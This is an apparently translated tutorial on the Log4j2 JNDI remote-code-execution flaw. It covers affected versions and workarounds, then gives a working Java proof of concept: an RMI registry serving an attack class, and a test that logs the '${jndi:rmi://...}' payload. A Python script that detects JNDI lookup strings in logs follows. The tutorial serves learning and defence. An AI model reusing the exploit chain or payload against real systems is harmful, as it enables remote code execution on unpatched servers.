Vulnerability severity and affected versions
Apache Log4j remote code execution vulnerability: Critical
Affected version range: Apache Log4j 2.x <= 2.14.1
Log4j2 vulnerability remediation
Upgrade to the latest Log4j2 package:
https://logging.apache.org/log4j/2.x/download.html
Temporary workarounds
(1) Add the JVM parameter to the project: -Dlog4j2.formatMsgNoLookups=true
(2) Set the Log4j2 configuration property: log4j2.formatMsgNoLookups=True
(3) Set the system environment variable FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS to true
Demo
Demo repository: https://github.com/raineddown/log4j2-bug
Code walkthrough:
package local;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

// The vulnerable application: the username is passed to the logger as a
// message parameter, so on Log4j 2.x <= 2.14.1 a ${jndi:...} value is
// resolved by the lookup mechanism while the message is formatted.
// (Package name inferred from the logger name "local.App" in the output below.)
public class App {
    private static Logger log = LogManager.getLogger(App.class);

    public void register(String username) {
        log.error("{},注册了账号", username);
    }
}
package remote;

import java.util.Hashtable;
import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;

// ObjectFactory that the application instantiates when it resolves the
// JNDI Reference served by the registry below; the static block runs as
// soon as the class is loaded.
public class Attack implements ObjectFactory {
    static {
        System.out.println("静态代码块攻击");
    }

    @Override
    public Object getObjectInstance(Object obj, Name name, Context nameCtx,
                                    Hashtable<?, ?> environment) throws Exception {
        System.out.println("你被攻击了");
        return "【攻击者】";
    }
}
package remote;

import java.rmi.AlreadyBoundException;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import javax.naming.NamingException;
import javax.naming.Reference;
import com.sun.jndi.rmi.registry.ReferenceWrapper;

// Local RMI registry on port 1099 that binds a Reference to remote.Attack
// under the name "remote".
public class Remote {
    public static void main(String[] args)
            throws RemoteException, NamingException, AlreadyBoundException {
        Registry registry = LocateRegistry.createRegistry(1099);
        Reference reference = new Reference("remote.Attack", "remote.Attack", null);
        ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
        registry.bind("remote", referenceWrapper);
        System.out.println("remote start.........");
    }
}
Attack test class:
import javax.naming.InitialContext;
import javax.naming.NamingException;
import local.App;
import org.junit.Test;

// Class name assumed; the original post shows only the two test methods.
public class AppTest {

    // Direct JNDI lookup against the local registry, independent of Log4j.
    @Test
    public void testJndi() {
        try {
            System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
            String uri = "rmi://127.0.0.1:1099/remote";
            InitialContext initialContext = new InitialContext();
            Object lookup = initialContext.lookup(uri);
            System.out.println(lookup);
        } catch (NamingException e) {
            e.printStackTrace();
        }
    }

    // The same lookup, triggered only through the logged username parameter.
    @Test
    public void testRegister() {
        String username = "${jndi:rmi://127.0.0.1:1099/remote}";
        App app = new App();
        app.register(username);
    }
}
Test results:
Testing resource retrieval
Testing the static-block attack
静态代码块攻击
你被攻击了
20:38:58.040 [main] ERROR local.App - 【攻击者】,注册了账号
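The demo above shows that the payload reaches Log4j as ordinary user input and that the only lookup string involved is `${jndi:rmi://...}`. The following added example (not part of the original post or the demo repository) takes the defender's side of that: it scans constructed sample log lines for JNDI lookup strings of the form used in the demo, reporting the scheme, host and port for triage, and checks whether a JVM command line carries the `-Dlog4j2.formatMsgNoLookups=true` workaround from the remediation section. The sample lines, the hosts in them and the function names are constructed for this example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Matches a Log4j lookup of the form ${jndi:<scheme>://<host>[:port]/<path>}
# as it appears in the demo payload. Case-insensitive, since Log4j lookup
# keys are not case-sensitive.
JNDI_PATTERN = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:\s*//\s*"
    r"(?P<host>[^/:\s}]+)(?::(?P<port>\d+))?[^}]*\}",
    re.IGNORECASE,
)


@dataclass
class JndiHit:
    line_no: int
    scheme: str
    host: str
    port: Optional[int]
    payload: str


def find_jndi_lookups(lines: List[str]) -> List[JndiHit]:
    """Return one JndiHit per JNDI lookup string found in the given lines."""
    hits = []
    for line_no, line in enumerate(lines, start=1):
        for m in JNDI_PATTERN.finditer(line):
            port = int(m.group("port")) if m.group("port") else None
            hits.append(JndiHit(line_no, m.group("scheme").lower(),
                                m.group("host"), port, m.group(0)))
    return hits


def format_lookups_disabled(jvm_args: List[str]) -> bool:
    """True if the JVM command line sets -Dlog4j2.formatMsgNoLookups=true
    (workaround (1) above). Upgrading Log4j2 remains the real fix."""
    for arg in jvm_args:
        if arg.lower().startswith("-dlog4j2.formatmsgnolookups="):
            return arg.split("=", 1)[1].strip().lower() == "true"
    return False


# Constructed sample lines (not real traffic): two access-log lines carrying
# the demo payload in a request field, plus benign lines.
SAMPLE_LINES = [
    '10.0.0.5 - - "GET /index HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "POST /register HTTP/1.1" 200 "${jndi:rmi://127.0.0.1:1099/remote}"',
    '10.0.0.9 - - "GET /login HTTP/1.1" 200 "${JNDI:rmi://registry.example.test/x}"',
    '20:38:58.040 [main] ERROR local.App - alice,注册了账号',
]

if __name__ == "__main__":
    for hit in find_jndi_lookups(SAMPLE_LINES):
        print(f"line {hit.line_no}: jndi lookup via {hit.scheme} to "
              f"{hit.host}:{hit.port} -> {hit.payload}")
    print("lookups disabled:",
          format_lookups_disabled(["java", "-Dlog4j2.formatMsgNoLookups=true",
                                   "-jar", "app.jar"]))
```

Run it against a real access log by replacing `SAMPLE_LINES` with the file's lines; any hit is worth an alert regardless of whether the workaround flag is present, because the flag only stops the lookup, not the attempt.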